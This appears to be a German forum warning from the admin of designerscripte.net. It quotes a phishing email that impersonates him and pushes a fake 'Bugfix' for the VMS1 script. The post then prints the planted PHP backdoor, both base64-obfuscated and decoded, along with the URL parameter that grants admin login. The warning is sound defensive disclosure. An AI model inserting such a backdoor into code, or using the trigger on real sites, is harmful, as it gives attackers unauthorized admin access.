Ich wurde darüber informiert das in meinem Nahmen Mails versendet werden.

Die Emails Sind SPAMM
Installiert dieses "Bugfix" NICHT.
Wer diese Datei bereits eingefügt hat Sollte diese Umgehend entfernen.
Die Originaldatei kann im Downloadbereich heruntergeladen werden.


Ich sende emails nur von Topleveldomains wie Designerscripte.net oderlktechnik.ch
von arcor 1und1 web.de etc werdet ihr NIEMALS emails von mir bekommen.

Ich werde gegen Richard Strafanzeige stellen.

Gesendet: Montag, 20. Mai 2013 um 13:21 UhrVon: yunn@arcor.de
Betreff: Aw: Sicherheits-Patch: VMS1
Und hier wäre der Bugfix. Aus unerklärlichen Gründen konnte ich den gerade nicht anhängen.

vG
Joel Kuder
Admin Designerscripte.net, Snippis & LKTechnik
http://www.designerscripte.net/ - Home of VMS1

----- Original Nachricht ----
Von: yunn@arcor.de
Datum: 20.05.2013 13:20
Betreff: Sicherheits-Patch: VMS1

> Hallo,
>
> du verwendest auf deiner Seite das VMS1 Script von designerscripte.net,
> dieses enthält jedoch beim Adminlogin einen großen Sicherheitsfehler.
>
> Dieser wurde noch nicht ausgemerzt und anscheinend auch noch nicht
> missbraucht. Trotzdem habe ich dafür jetzt ein Bugfix entwickelt.
>
> Um den Fehler zu beheben bitte einfach die Datei adminforce/index.php deiner
> Installation durch die im Anhang ersetzen, dort ist eine zusätzliche
> Sicherheitsklasse integriert. Dieser Bugfix wird wärmstens von mir
> empfohlen.
>
> vG
> Joel Kuder
> Admin Designerscripte.net, Snippis & LKTechnik
> http://www.designerscripte.net/ - Home of VMS1


>
Anhang:


Aufklärung:

Folgender eingefügter Code (in der Datei
PHP-Code:
<?php if($_GET[base64_decode('cmljaGFyZA==')]==base64_decode('amE=')){$_SESSION[base64_decode('YWRtaW4=')]=1;}?>
bedeutet gleich viel wie:
PHP-Code:
<?php if($_GET['richard']=='ja'){$_SESSION['admin']=1;}?>
Bedeutet wenn url.tld/admin/index.php?richard=ja aufgerufen wird ist man eingeloggt!!!